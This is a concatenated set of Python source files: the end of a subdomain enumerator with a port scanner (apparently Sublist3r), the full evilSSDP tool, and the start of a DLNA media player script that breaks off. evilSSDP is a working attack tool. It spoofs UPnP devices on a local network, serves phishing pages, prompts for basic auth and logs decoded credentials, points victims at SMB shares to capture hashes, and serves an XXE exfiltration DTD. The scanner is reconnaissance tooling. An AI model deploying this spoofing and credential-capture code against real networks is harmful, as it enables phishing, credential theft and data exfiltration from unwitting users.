                        self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
                    self.subdomains.append(subdomain.strip())
        except Exception as e:
            pass
class CrtSearch(enumratorBaseThreaded):
    """Enumerate subdomains from SSL certificate transparency logs (crt.sh)."""
    def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
        subdomains = subdomains or []
        # %25 is a URL-encoded '%', i.e. a wildcard match on crt.sh.
        base_url = 'https://crt.sh/?q=%25.{domain}'
        self.engine_name = "SSL Certificates"
        self.q = q
        super(CrtSearch, self).__init__(base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
        return
    def req(self, url):
        """GET *url*; return body text or the 'NULL' sentinel."""
        try:
            resp = self.session.get(url, headers=self.headers, timeout=self.timeout)
        except Exception:
            resp = None
        return self.get_response(resp)
    def enumerate(self):
        # Single results page; no pagination.
        url = self.base_url.format(domain=self.domain)
        resp = self.req(url)
        if resp:
            self.extract_domains(resp)
        return self.subdomains
    def extract_domains(self, resp):
        """Collect certificate names from the crt.sh results table cells."""
        link_regx = re.compile('<TD>(.*?)</TD>')
        try:
            links = link_regx.findall(resp)
            for link in links:
                link = link.strip()
                subdomains = []
                # A single cell may list several SANs separated by <BR>.
                if '<BR>' in link:
                    subdomains = link.split('<BR>')
                else:
                    subdomains.append(link)
                for subdomain in subdomains:
                    # Skip wildcard entries and out-of-scope names.
                    if not subdomain.endswith(self.domain) or '*' in subdomain:
                        continue
                    # Strip an email-style prefix (e.g. from admin@ entries).
                    if '@' in subdomain:
                        subdomain = subdomain[subdomain.find('@')+1:]
                    if subdomain not in self.subdomains and subdomain != self.domain:
                        if self.verbose:
                            self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
                        self.subdomains.append(subdomain.strip())
        except Exception as e:
            # NOTE(review): debug print left in — other engines swallow silently.
            print(e)
            pass
class PassiveDNS(enumratorBaseThreaded):
    """Enumerate subdomains via the api.sublist3r.com passive-DNS endpoint."""
    def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
        subdomains = subdomains or []
        base_url = 'https://api.sublist3r.com/search.php?domain={domain}'
        self.engine_name = "PassiveDNS"
        self.q = q
        super(PassiveDNS, self).__init__(base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
        return
    def req(self, url):
        """GET *url*; return body text or the 'NULL' sentinel."""
        try:
            resp = self.session.get(url, headers=self.headers, timeout=self.timeout)
        except Exception as e:
            resp = None
        return self.get_response(resp)
    def enumerate(self):
        # Single API call returning a JSON array of subdomains.
        url = self.base_url.format(domain=self.domain)
        resp = self.req(url)
        if not resp:
            return self.subdomains
        self.extract_domains(resp)
        return self.subdomains
    def extract_domains(self, resp):
        """Collect entries from the JSON array response."""
        try:
            subdomains = json.loads(resp)
            for subdomain in subdomains:
                if subdomain not in self.subdomains and subdomain != self.domain:
                    if self.verbose:
                        self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
                    self.subdomains.append(subdomain.strip())
        except Exception as e:
            pass
class portscan():
    """Threaded TCP connect() scanner for the discovered subdomains."""
    def __init__(self, subdomains, ports):
        self.subdomains = subdomains
        self.ports = ports  # list of port strings (from '--ports a,b,c')
        self.lock = None    # BoundedSemaphore, created in run()
    def port_scan(self, host, ports):
        """Attempt a TCP connect to each port on *host*; print any open ones."""
        openports = []
        # The semaphore caps how many hosts are scanned concurrently (20);
        # it is held for the host's whole port list.
        self.lock.acquire()
        for port in ports:
            try:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.settimeout(2)
                # connect_ex returns 0 on success instead of raising.
                result = s.connect_ex((host, int(port)))
                if result == 0:
                    openports.append(port)
                s.close()
            except Exception:
                pass
        self.lock.release()
        if len(openports) > 0:
            print("%s%s%s - %sFound open ports:%s %s%s%s" % (G, host, W, R, W, Y, ', '.join(openports), W))
    def run(self):
        # Fire one worker thread per host; results are printed, not returned.
        self.lock = threading.BoundedSemaphore(value=20)
        for subdomain in self.subdomains:
            t = threading.Thread(target=self.port_scan, args=(subdomain, self.ports))
            t.start()
def main(domain, threads, savefile, ports, silent, verbose, enable_bruteforce, engines):
    """Enumerate subdomains of *domain* with the selected engines.

    Optionally bruteforces via subbrute, saves results to *savefile*, and/or
    port-scans the findings. Returns the sorted list of unique subdomains
    (empty list if *domain* fails validation).
    """
    bruteforce_list = set()
    search_list = set()
    # On Windows a Manager().list() proxy is avoided; NOTE(review): a plain
    # list is not shared across processes, so engine results may be lost
    # there — confirm intended behavior.
    if is_windows:
        subdomains_queue = list()
    else:
        subdomains_queue = multiprocessing.Manager().list()
    # -b with no value parses as None (nargs='?'); treat that as enabled.
    if enable_bruteforce or enable_bruteforce is None:
        enable_bruteforce = True
    # Validate domain
    domain_check = re.compile("^(http|https)?[a-zA-Z0-9]+([\-\.]{1}[a-zA-Z0-9]+)*\.[a-zA-Z]{2,}$")
    if not domain_check.match(domain):
        if not silent:
            print(R + "Error: Please enter a valid domain" + W)
        return []
    # BUGFIX: the original used 'or', which is always true (a string cannot
    # start with both schemes), so 'http://' was prepended even to https://
    # URLs. Only add a scheme when neither one is present.
    if not domain.startswith('http://') and not domain.startswith('https://'):
        domain = 'http://' + domain
    parsed_domain = urlparse.urlparse(domain)
    if not silent:
        print(B + "[-] Enumerating subdomains now for %s" % parsed_domain.netloc + W)
    if verbose and not silent:
        print(Y + "[-] verbosity is enabled, will show the subdomains results in realtime" + W)
    # Map of user-facing engine names to enumerator classes.
    supported_engines = {'baidu': BaiduEnum,
                         'yahoo': YahooEnum,
                         'google': GoogleEnum,
                         'bing': BingEnum,
                         'ask': AskEnum,
                         'netcraft': NetcraftEnum,
                         'dnsdumpster': DNSdumpster,
                         #'virustotal': Virustotal,
                         'threatcrowd': ThreatCrowd,
                         'ssl': CrtSearch,
                         'passivedns': PassiveDNS
                         }
    chosenEnums = []
    if engines is None:
        # Default set (Virustotal is intentionally disabled).
        chosenEnums = [
            BaiduEnum, YahooEnum, GoogleEnum, BingEnum, AskEnum,
            NetcraftEnum, DNSdumpster, ThreatCrowd,
            CrtSearch, PassiveDNS
        ]
    else:
        # Honor the user's comma-separated engine selection; unknown names
        # are silently skipped.
        engines = engines.split(',')
        for engine in engines:
            if engine.lower() in supported_engines:
                chosenEnums.append(supported_engines[engine.lower()])
    # Start the engines enumeration: each enumerator is a separate process
    # publishing into the shared queue.
    enums = [enum(domain, [], q=subdomains_queue, silent=silent, verbose=verbose) for enum in chosenEnums]
    for enum in enums:
        enum.start()
    for enum in enums:
        enum.join()
    subdomains = set(subdomains_queue)
    for subdomain in subdomains:
        search_list.add(subdomain)
    if enable_bruteforce:
        if not silent:
            print(G + "[-] Starting bruteforce module now using subbrute.." + W)
        record_type = False
        path_to_file = os.path.dirname(os.path.realpath(__file__))
        subs = os.path.join(path_to_file, 'subbrute', 'names.txt')
        resolvers = os.path.join(path_to_file, 'subbrute', 'resolvers.txt')
        process_count = threads
        output = False
        json_output = False
        bruteforce_list = subbrute.print_target(parsed_domain.netloc, record_type, subs, resolvers, process_count, output, json_output, search_list, verbose)
    subdomains = search_list.union(bruteforce_list)
    if subdomains:
        # Sort so subdomains of a common parent group together.
        subdomains = sorted(subdomains, key=subdomain_sorting_key)
        if savefile:
            write_file(savefile, subdomains)
        if not silent:
            print(Y + "[-] Total Unique Subdomains Found: %s" % len(subdomains) + W)
        if ports:
            if not silent:
                print(G + "[-] Start port scan now for the following ports: %s%s" % (Y, ports) + W)
            ports = ports.split(',')
            pscan = portscan(subdomains, ports)
            pscan.run()
        elif not silent:
            for subdomain in subdomains:
                print(G + subdomain + W)
    return subdomains
def interactive():
    """CLI entry point: read the command-line arguments, print the banner and
    run the enumeration via main()."""
    args = parse_args()
    # argparse can leave verbose as None (flag given without a value); both a
    # truthy value and None mean "verbose on".
    verbose = True if (args.verbose or args.verbose is None) else args.verbose
    if args.no_color:
        no_color()
    banner()
    main(args.domain, args.threads, args.output, args.ports,
         silent=False, verbose=verbose,
         enable_bruteforce=args.bruteforce, engines=args.engines)
# Script entry point: run the interactive CLI when executed directly.
if __name__ == "__main__":
    interactive()
|
essdp.py
|
#!/usr/bin/env python3
import sys

# Fail fast on Python 2 - everything below relies on Python 3 stdlib layouts.
if sys.version_info < (3, 0):
    print("\nSorry mate, you'll need to use Python 3+ on this one...\n")
    sys.exit(1)

from multiprocessing import Process
from string import Template
from http.server import BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
from http.server import HTTPServer
from email.utils import formatdate
from time import sleep
from ipaddress import ip_address
# One import per line (PEP 8); the original semicolon-joined line imported
# 're' twice.
import argparse
import base64
import os
import re
import signal
import socket
import struct
import time

banner = r'''
 ___________ .__.__ _________ _________________ __________
 \_ _____/__ _|__| | / _____// _____/\______ \\______ \
 | __)_\ \/ / | | \_____ \ \_____ \ | | \| ___/
 | \\ /| | |__/ \/ \ | ` \ |
 /_______ / \_/ |__|____/_______ /_______ //_______ /____|
 \/ \/ \/ \/
...by initstring (gitlab.com/initstring)
Additional contributors: Dwight Hohnstein
'''
print(banner)
############################# Global Variable Declarations #############################
class bcolors:
    """ANSI escape sequences used to colorize terminal output."""
    GREEN = '\033[92m'
    BLUE = '\033[94m'
    ORANGE = '\033[93m'
    RED = '\033[91m'
    ENDC = '\033[0m'  # reset - ends a colored span
# Pre-colored log prefixes used throughout the console output.
okBox = bcolors.BLUE + '[*] ' + bcolors.ENDC
noteBox = bcolors.GREEN + '[+] ' + bcolors.ENDC
warnBox = bcolors.ORANGE + '[!] ' + bcolors.ENDC
msearchBox = bcolors.BLUE + '[M-SEARCH] ' + bcolors.ENDC
xmlBox = bcolors.GREEN + '[XML REQUEST] ' + bcolors.ENDC
phishBox = bcolors.RED + '[PHISH HOOKED] ' + bcolors.ENDC
credsBox = bcolors.RED + '[CREDS GIVEN] ' + bcolors.ENDC
xxeBox = bcolors.RED + '[XXE VULN!!!!] ' + bcolors.ENDC
exfilBox = bcolors.RED + '[EXFILTRATION] ' + bcolors.ENDC

# Command-line interface (parsed at import time - this is a script, not a library).
parser = argparse.ArgumentParser()
parser.add_argument('interface', type=str, help='Network interface to listen on.', action='store')
parser.add_argument('-p', '--port', type=str, default=8888, help='Port for HTTP server. Defaults to 8888.'
                    , action='store')
parser.add_argument('-t', '--template', type=str, default='office365', help='Name of a folder in the templates \
directory. Defaults to "office365". This will determine xml and phishing pages used.'
                    , action='store')
parser.add_argument('-s', '--smb', type=str, help='IP address of your SMB server. Defalts to the \
primary address of the "interface" provided.', action='store')
parser.add_argument('-b', '--basic', default=False, action="store_true", help="Enable base64 authentication for \
templates and write credentials to creds.txt")
parser.add_argument("-r", "--realm", type=str, default="Microsoft Corporation", help="Realm to appear when prompting \
users for authentication via base64 auth.", action="store")
parser.add_argument("-u", "--url", type=str, default="", help="Add javascript to the template to redirect from the \
phishing page to the provided URL.", action="store")
args = parser.parse_args()

charWhitelist = re.compile('[^a-zA-Z0-9 ._-]') # Defining a list of expected characters for a network device
interface = charWhitelist.sub('', args.interface) # Avoiding command injection vulnerabilities
localPort = int(args.port)
templateDir = os.path.dirname(os.path.abspath(__file__)) + '/templates/' + args.template
isAuth = args.basic           # -b/--basic: demand HTTP basic auth before serving the phish page
realm = args.realm            # realm string shown in the browser's auth prompt
redirectUrl = args.url        # optional JS redirect target injected into the template

# Refuse to start if the chosen template folder is missing.
if not os.path.isdir(templateDir):
    print(warnBox + "Sorry, that template directory does not exist. Please double-check and try again.")
    sys.exit()
############################# End Global Variable Declarations #############################
class SSDPListener:
    """
    Binds to the SSDP-spec multicast group (239.255.255.250:1900) and exposes
    the receiving socket. Incoming UDP multicast traffic is read and processed
    by the main() loop; this class only performs the socket/multicast setup.
    """
    def __init__(self, localIp, localPort):
        self.sock = None
        self.knownHosts = []
        self.localIp = localIp
        self.localPort = localPort

        # Both values are fixed by the SSDP specification - do not change.
        ssdp_port = 1900
        multicast_group = '239.255.255.250'

        # Listen on all interfaces for the SSDP port.
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.sock.bind(('', ssdp_port))

        # Join the multicast group on the interface identified by localIp
        # (struct ip_mreq: group address followed by interface address).
        membership = struct.pack(
            '4s4s',
            socket.inet_aton(multicast_group),
            socket.inet_aton(self.localIp))
        self.sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, membership)
class MultiThreadedHTTPServer(ThreadingMixIn, HTTPServer):
    """
    Setting up this definition allows us to serve multiple HTTP requests in parallel.
    Without this, a client device may hang the HTTP server, blocking other devices from properly accessing and
    parsing the XML files.
    """
    # ThreadingMixIn dispatches each request on its own thread; HTTPServer
    # supplies everything else, so no body is needed.
    pass
def MakeHTTPClass(deviceXML, serviceXML, phishPage, exfilDTD):
    """
    The class below is being built inside a function to allow us to easily pass variables to built-in functions.
    This will build a multi-threaded HTTP server listening for specific requests for the XML files we are serving.
    When used with the 'xxe' template, it will also notify on apps that have potential 0-day XXE vulnerabilities
    in their XML parsing engines. If you see that warning, it may be CVE time!
    Any requests to the HTTP server other than those defined will be given the phishing page. The phishing page
    can optionally request an interactive logon if the "-b / --basic" has been specified.
    The phishing page the devices SHOULD be requesting is 'present.html' but we will serve it to all requests,
    in case a curious users sees the reference and browses there manually.
    """
    class DeviceDescriptor(BaseHTTPRequestHandler):
        def do_GET(self):
            # (ip, port) the HTTP server is bound to; shadows the module-level
            # globals of the same names inside this method only.
            localIp,localPort = self.server.server_address
            if self.path == '/ssdp/device-desc.xml': # Parsed automatically by all SSDP apps
                self.send_response(200)
                self.send_header('Content-type', 'application/xml')
                self.end_headers()
                self.wfile.write(deviceXML.encode())
            elif self.path == '/ssdp/service-desc.xml': # Not yet implemented
                self.send_response(200)
                self.send_header('Content-type', 'application/xml')
                self.end_headers()
                self.wfile.write(serviceXML.encode())
            elif self.path == '/ssdp/xxe.html': # Access indicates XXE vulnerability
                self.send_response(200)
                self.send_header('Content-type', 'application/xml')
                self.end_headers()
                self.wfile.write('.'.encode())
            elif self.path == '/ssdp/data.dtd': # Used for XXE exploitation
                self.send_response(200)
                self.send_header('Content-type', 'application/xml')
                self.end_headers()
                self.wfile.write(exfilDTD.encode())
            else:
                if isAuth: # If user enables -b/--basic in CLI args
                    if 'Authorization' not in self.headers: # If creds not given, ask for them
                        self.process_authentication()
                        self.wfile.write("Unauthorized.".encode())
                    elif 'Basic ' in self.headers['Authorization']: # Return phishing page after getting creds
                        self.send_response(200)
                        self.send_header('Content-type', 'text/html')
                        self.end_headers()
                        self.wfile.write(phishPage.encode())
                    else:
                        # Unexpected Authorization scheme.
                        self.send_response(500)
                        self.wfile.write("Something happened.".encode())
                else: # Return phishing page for everything else
                    self.send_response(200)
                    self.send_header('Content-type', 'text/html')
                    self.end_headers()
                    self.wfile.write(phishPage.encode())

        def do_POST(self):
            # NOTE(review): localIp/localPort here resolve to the module-level
            # globals set in main(), not the locals created in do_GET.
            if self.path == '/ssdp/do_login.html': # For phishing templates to POST creds to
                self.send_response(301)
                self.send_header('Location','http://{}:{}/present.html'.format(localIp, localPort))
                self.end_headers()

        def process_authentication(self):
            """
            Will prompt user for credentials, causing execution to go back to the do_GET funtion for further
            processing.
            """
            self.send_response(401)
            self.send_header('WWW-Authenticate', 'Basic realm=\"{}\"'.format(realm))
            self.send_header('Content-type','text/html')
            self.end_headers()

        def write_log(self, data):
            """
            Will append important info to a log file. This includes credentials given via basic auth as well as
            XXE vulnerabilities.
            """
            with open('logs-essdp.txt', 'a') as logFile:
                timeStamp = formatdate(timeval=None, localtime=True, usegmt=False)
                logFile.write(timeStamp + ": " + data + "\n")
                logFile.close()  # redundant inside 'with'; kept as-is

        def log_message(self, format, *args):
            """
            Overwriting the built in function to provide useful feedback inside the text UI.
            Providing the 'User Agent' is helpful in understanding the types of devices that are interacting
            with evilSSDP.
            The most important stuff (credentials submitted and XXE vulns) are logged to a text file in the
            working directory.
            """
            address = self.address_string()
            agent = self.headers['user-agent']
            verb = self.command
            path = self.path
            if 'xml' in self.path:
                print(xmlBox + "Host: {}, User-Agent: {}".format(address, agent))
                print(" {} {}".format(verb, path))
            elif 'xxe.html' in self.path:
                data = xxeBox + "Host: {}, User-Agent: {}\n".format(address, agent)
                data += " {} {}".format(verb, path)
                print(data)
                self.write_log(data)
            elif 'do_login' in self.path:
                # Credentials POSTed by the phishing form - read the body.
                contentLength = int(self.headers['Content-Length'])
                postBody = self.rfile.read(contentLength)
                credentials = postBody.decode('utf-8')
                data = credsBox + "HOST: {}, CREDS: {}".format(address, credentials)
                print(data)
                self.write_log(data)
            elif 'data.dtd' in self.path:
                data = xxeBox + "Host: {}, User-Agent: {}\n".format(address, agent)
                data += " {} {}".format(verb, path)
                print(data)
                self.write_log(data)
            elif 'exfiltrated' in self.path:
                data = exfilBox + "Host: {}, User-Agent: {}\n".format(address, agent)
                data += " {} {}".format(verb, path)
                print(data)
                self.write_log(data)
            else:
                print(phishBox + "Host: {}, User-Agent: {}".format(address, agent))
                print(" {} {}".format(verb, path))
                # Capture basic-auth credentials sent along with phish requests.
                if 'Authorization' in self.headers:
                    basic, encoded = self.headers['Authorization'].split(" ")
                    plaintext = base64.b64decode(encoded).decode()
                    data = credsBox + "HOST: {}, CREDS: {}".format(address, plaintext)
                    print(data)
                    self.write_log(data)

    return DeviceDescriptor
def get_ip():
    """
    Resolve the IPv4 address of the user-supplied interface by parsing
    `ifconfig` output. Used for serving the XML files and as the default SMB
    pointer. Exits the program when the address cannot be determined.
    """
    try:
        output = os.popen('ifconfig ' + interface).read()
        return re.findall(r'inet (?:addr:)?(.*?) ', output)[0]
    except Exception:
        print(warnBox + "Could not get network interface info. Please check and try again.")
        sys.exit()
def set_smb():
    """
    Choose the IP address of the SMB server embedded in the phishing page.
    evilSSDP does not provide an SMB server itself - it only points somewhere.
    You must host your own SMB server with something like Impacket.

    Returns the validated --smb argument when given, otherwise the IP address
    of the listening interface.
    """
    if args.smb:
        # Bug fix: ip_address() raises ValueError on malformed input rather
        # than returning False, so the old "if ip_address(...)" test could
        # never reach its error message - catch the exception instead.
        try:
            ip_address(args.smb)
        except ValueError:
            print("Sorry, that is not a valid IP address for your SMB server.")
            sys.exit()
        return args.smb
    return localIp
def process_data(listener, data, address):
    """
    Handle one raw datagram received on the SSDPListener socket. For M-SEARCH
    requests, extract the requested Service Type (falling back to 'ssdp:all'
    when it cannot be parsed) and reply with our device location. Each
    (host, service-type) pair is only announced once to keep output readable.
    """
    remoteIp, remotePort = address
    if 'M-SEARCH' not in str(data):
        return
    try:
        requestedST = re.findall(r'\\r\\nST:(.*?)\\r\\n', str(data))[0].strip()
    except:
        requestedST = 'ssdp:all'
    host_key = (address[0], requestedST)
    if host_key not in listener.knownHosts:
        print(msearchBox + "New Host {}, Service Type: {}".format(remoteIp, requestedST))
        listener.knownHosts.append(host_key)
    send_location(listener, address, requestedST)
def send_location(listener, address, requestedST):
    """
    Answer an M-SEARCH with a unicast HTTP/1.1-over-UDP response pointing the
    client at our device-descriptor URL. The LOCATION and ST headers are what
    make the client fetch and parse the XML.

    listener    -- SSDPListener whose socket the reply is sent from
    address     -- (ip, port) of the requester
    requestedST -- service type echoed back in the ST header
    """
    URL = 'http://{}:{}/ssdp/device-desc.xml'.format(localIp, localPort)
    dateFormat = formatdate(timeval=None, localtime=False, usegmt=True)
    reply = 'HTTP/1.1 200 OK\r\n'
    reply += 'CACHE-CONTROL: max-age=1800\r\n'
    reply += 'DATE: ' + dateFormat + '\r\n'
    reply += 'EXT: \r\n'
    reply += 'LOCATION: ' + URL + '\r\n'
    reply += 'SERVER: Linux/3.10.96+, UPnP/1.0, eSSDP/0.1\r\n'
    reply += 'ST: {}\r\n'.format(requestedST)
    # Bug fix: this header previously ended with a bare '\n'; SSDP/HTTP
    # headers must be CRLF-terminated or strict parsers will reject them.
    reply += 'USN: uuid:e415ce0a-3e62-22d0-ad3f-42ec42e36563:upnp-rootdevice\r\n'
    reply += 'BOOTID.UPNP.ORG: 0\r\n'
    reply += 'CONFIGID.UPNP.ORG: 1\r\n'
    reply += '\r\n\r\n'
    # (removed an unused 'lastSeen' timestamp local)
    listener.sock.sendto(bytes(reply, 'utf-8'), address)
def buildDeviceXML(smbServer):
    """
    Render the device descriptor XML from the chosen template directory,
    substituting the local web server address and the SMB pointer.
    """
    variables = {'localIp': localIp,
                 'localPort': localPort,
                 'smbServer': smbServer}
    # 'with' guarantees the template file handle is closed (it leaked before).
    with open(templateDir + '/device.xml') as fileIn:
        template = Template(fileIn.read())
    return template.substitute(variables)
def buildServiceXML():
    """
    Render the service descriptor XML if the chosen template provides one,
    otherwise return a placeholder ('.'). ***Not yet implemented in evilSSDP***
    """
    service_path = templateDir + '/service.xml'
    # Bug fix: the old check was "'service.xml' in templateDir", which tested
    # the *directory path string* and therefore never matched - test for the
    # actual template file instead.
    if os.path.isfile(service_path):
        variables = {'localIp': localIp,
                     'localPort': localPort}
        with open(service_path) as fileIn:
            xmlFile = Template(fileIn.read()).substitute(variables)
    else:
        xmlFile = '.'
    return xmlFile
def buildPhish(smbServer):
    """
    Render the phishing page served when users open up an evil device,
    substituting the SMB pointer and optional redirect URL.
    """
    variables = {'smbServer': smbServer,
                 'redirectUrl': redirectUrl}
    # 'with' guarantees the template file handle is closed (it leaked before).
    with open(templateDir + '/present.html') as fileIn:
        template = Template(fileIn.read())
    return template.substitute(variables)
def buildExfil():
    """
    Render the DTD used for data exfiltration when running the xxe-exfil
    template; return a placeholder ('.') for every other template.
    """
    # The template *name* appears in the path, so this substring check is the
    # intended template selector (same test is used by print_details).
    if 'xxe-exfil' in templateDir:
        variables = {'localIp': localIp,
                     'localPort': localPort}
        # 'with' guarantees the file handle is closed (it leaked before).
        with open(templateDir + '/data.dtd') as fileIn:
            exfilPage = Template(fileIn.read()).substitute(variables)
    else:
        exfilPage = '.'
    return exfilPage
def serve_html(deviceXML, serviceXML, phishPage, exfilDTD):
    """
    Build the request-handler class and run the multi-threaded HTTP server
    that delivers the XML descriptors and the phishing page. Blocks forever.
    """
    handler_class = MakeHTTPClass(deviceXML, serviceXML, phishPage, exfilDTD)
    MultiThreadedHTTPServer.allow_reuse_address = True
    server = MultiThreadedHTTPServer((localIp, localPort), handler_class)
    server.serve_forever()
def print_details(smbServer):
    """Print a startup summary of the configured URLs, template and SMB pointer."""
    print("\n\n")
    print("########################################")
    print(okBox + "EVIL TEMPLATE: {}".format(templateDir))
    print(okBox + "MSEARCH LISTENER: {}".format(interface))
    print(okBox + "DEVICE DESCRIPTOR: http://{}:{}/ssdp/device-desc.xml".format(localIp, localPort))
    print(okBox + "SERVICE DESCRIPTOR: http://{}:{}/ssdp/service-desc.xml".format(localIp, localPort))
    print(okBox + "PHISHING PAGE: http://{}:{}/ssdp/present.html".format(localIp, localPort))
    if redirectUrl:
        print(okBox + "REDIRECT URL: {}".format(redirectUrl))
    if isAuth:
        print(okBox + "AUTH ENABLED, REALM: {}".format(realm))
    # The xxe-exfil template has no SMB pointer; show the exfil DTD URL instead.
    if 'xxe-exfil' in templateDir:
        print(okBox + "EXFIL PAGE: http://{}:{}/ssdp/data.dtd".format(localIp, localPort))
    else:
        print(okBox + "SMB POINTER: file://///{}/smb/hash.jpg".format(smbServer))
    print("########################################")
    print("\n\n")
def listen_msearch():
    """
    Bind the SSDP multicast listener and feed every received datagram to
    process_data(). Runs forever.
    """
    listener = SSDPListener(localIp, localPort)
    while True:
        datagram, sender = listener.sock.recvfrom(1024)
        process_data(listener, datagram, sender)
def main():
    """Wire everything together: resolve configuration, render the template
    content, print a summary and run the HTTP + SSDP servers until Ctrl-C."""
    global localIp
    localIp = get_ip() # Extract IP address of provided interface
    smbServer = set_smb() # Choose which IP we will inject into IMG tags for phishing
    deviceXML = buildDeviceXML(smbServer) # Build the primary XML file parsed in all instances
    serviceXML = buildServiceXML() # Not yet implemented, may be necessary for advanced future templates
    phishPage = buildPhish(smbServer) # Build the phishing page displayed to users who click evil devices
    exfilDTD = buildExfil() # Used in 0-day XXE detection to resolve exfiltration variables
    print_details(smbServer) # Provide details of our configuration on the CLI
    try: # Spawn the web server and SSDP server as separate threads
        webServer = Process(target=serve_html, args=(deviceXML, serviceXML, phishPage, exfilDTD))
        ssdpServer = Process(target=listen_msearch, args=())
        webServer.start()
        ssdpServer.start()
        # Block the parent until a signal (e.g. Ctrl-C) arrives.
        signal.pause()
    except (KeyboardInterrupt, SystemExit): # Allow for a graceful exit when pressing Ctrl-C
        print("\n" + warnBox + "Thanks for playing! Stopping threads and exiting...\n")
        webServer.terminate()
        ssdpServer.terminate()
        sleep(3)
        sys.exit()
# Script entry point.
if __name__ == "__main__":
    main()
|
dlnap.py
|
#!/usr/bin/python
# @file dlnap.py
# @author cherezov.pavel@gmail.com
# @brief Python over the network media player to playback on DLNA UPnP devices.
# Change log:
# 0.1 initial version.
# 0.2 device renamed to DlnapDevice; DLNAPlayer is disappeared.
# 0.3 debug output is added. Extract location url fixed.
# 0.4 compatible discover mode added.
# 0.5 xml parser introduced for device descriptions
# 0.6 xpath introduced to navigate over xml dictionary
# 0.7 device ip argument introduced
# 0.8 debug output is replaced with standard logging
# 0.9 pause/stop added. Video playback tested on Samsung TV
# 0.10 proxy (draft) is introduced.
# 0.11 sync proxy for py2 and py3 implemented, --proxy-port added
# 0.12 local files can be played as well now via proxy
# 0.13 ssdp protocol version argument added
# 0.14 fixed bug with receiving responses from device
# 0.15 Lot's of fixes and features added thanks @ttopholm and @NicoPy
#
# 1.0 moved from idea version
__version__ = "0.15"
import re
import sys
import time
import signal
import socket
import select
import logging
import traceback
import mimetypes
from contextlib import contextmanager
import os
py3 = sys.version_info[0] == 3
if py3:
from urllib.request import urlopen
from http.server import HTTPServer
from http.server import BaseHTTPRequestHandler
else:
from urllib2 import urlopen
from BaseHTTPServer import BaseHTTPRequestHandler
from BaseHTTPServer import HTTPServer
import shutil
import threading
SSDP_GROUP = ("239.255.255.250", 1900)
URN_AVTransport = "urn:schemas-upnp-org:service:AVTransport:1"
URN_AVTransport_Fmt = "urn:schemas-upnp-org:service:AVTransport:{}"
URN_RenderingControl = "urn:schemas-upnp-org:service:RenderingControl:1"
URN_RenderingControl_Fmt = "urn:schemas-upnp-org:service:RenderingControl:{}"
SSDP_ALL = "ssdp:all"
# =================================================================================================
# XML to DICT
#
def _get_tag_value(x, i = 0):
    """ Get the nearest to 'i' position xml tag name.

    x -- xml string
    i -- position to start searching tag from
    return -- (tag, value, rest) triple: the tag name, its inner content, and
              the unparsed remainder of the string after the closing tag.
       e.g
          <d>
             <e>value4</e>
          </d>
       result is ('d', '<e>value4</e>', ...)
    """
    x = x.strip()
    value = ''
    tag = ''

    # skip <? > tag (xml declaration)
    if x[i:].startswith('<?'):
        i += 2
        while i < len(x) and x[i] != '<':
            i += 1

    # check for empty tag like '</tag>' - return it with an empty value
    if x[i:].startswith('</'):
        i += 2
        in_attr = False
        while i < len(x) and x[i] != '>':
            if x[i] == ' ':
                in_attr = True  # everything after the first space is attributes
            if not in_attr:
                tag += x[i]
            i += 1
        return (tag.strip(), '', x[i+1:])

    # not an xml, treat like a value
    if not x[i:].startswith('<'):
        return ('', x[i:], '')

    i += 1 # <

    # read first open tag
    in_attr = False
    while i < len(x) and x[i] != '>':
        # get rid of attributes
        if x[i] == ' ':
            in_attr = True
        if not in_attr:
            tag += x[i]
        i += 1

    i += 1 # >

    # replace self-closing <tag/> by <tag>None</tag> so the generic
    # open/close scan below also handles self-closing elements
    empty_elmt = '<' + tag + ' />'
    closed_elmt = '<' + tag + '>None</'+tag+'>'
    if x.startswith(empty_elmt):
        x = x.replace(empty_elmt, closed_elmt)

    # accumulate characters until the matching close tag is seen
    while i < len(x):
        value += x[i]
        if x[i] == '>' and value.endswith('</' + tag + '>'):
            # Note: will not work with xml like <a> <a></a> </a>
            close_tag_len = len(tag) + 2 # />
            value = value[:-close_tag_len]
            break
        i += 1

    return (tag.strip(), value[:-1], x[i+1:])
def _xml2dict(s, ignoreUntilXML = False):
    """ Convert xml to dictionary.

    <?xml version="1.0"?>
    <a any_tag="tag value">
       <b> <bb>value1</bb> </b>
       <b> <bb>value2</bb> </b>
       <d>
          <e>value4</e>
       </d>
       <g>value</g>
    </a>
    =>
    { 'a':
        {
          'b': [ {'bb':value1}, {'bb':value2} ],
          'd': { 'e': [value4] },
          'g': [value]
        }
    }

    s              -- xml string
    ignoreUntilXML -- drop any leading garbage before the first '<'
    """
    if ignoreUntilXML:
        s = ''.join(re.findall(".*?(<.*)", s, re.M))

    d = {}
    while s:
        tag, value, s = _get_tag_value(s)
        value = value.strip()
        # If the tag's content itself starts with a tag, recurse; otherwise
        # store it as a plain text value.
        isXml, _, _ = _get_tag_value(value)
        if tag not in d:
            d[tag] = []
        if not isXml:
            if not value:
                continue
            d[tag].append(value.strip())
        else:
            # (removed a duplicate "if tag not in d" guard - the check above
            # already guarantees the key exists)
            d[tag].append(_xml2dict(value))
    return d
s = """
hello
this is a bad
strings
<?xml version="1.0"?>
<a any_tag="tag value">
<b><bb>value1</bb></b>
<b><bb>value2</bb> <v>value3</v></b>
</c>
<d>
<e>value4</e>
</d>
<g>value</g>
</a>
"""
def _xpath(d, path):
""" Return value from xml dictionary at path.
d -- xml dictionary
path -- string path like root/device/serviceList/service@serviceType=URN_AVTransport/controlURL
return -- value at path or None if path not found
"""
for p in path.split('/'):
tag_attr = p.split('@')
tag = tag_attr[0]
if tag not in d:
return None
attr = tag_attr[1] if len(tag_attr) > 1 else ''
if attr:
a, aval = attr.split('=')
for s in d[tag]:
if s[a] == [aval]:
d = s
break
else:
d = d[tag][0]
return d
#
# XML to DICT
# =================================================================================================
# PROXY
#
running = False
class DownloadProxy(BaseHTTPRequestHandler):
    """HTTP handler that streams a local file or a remote url (taken from the
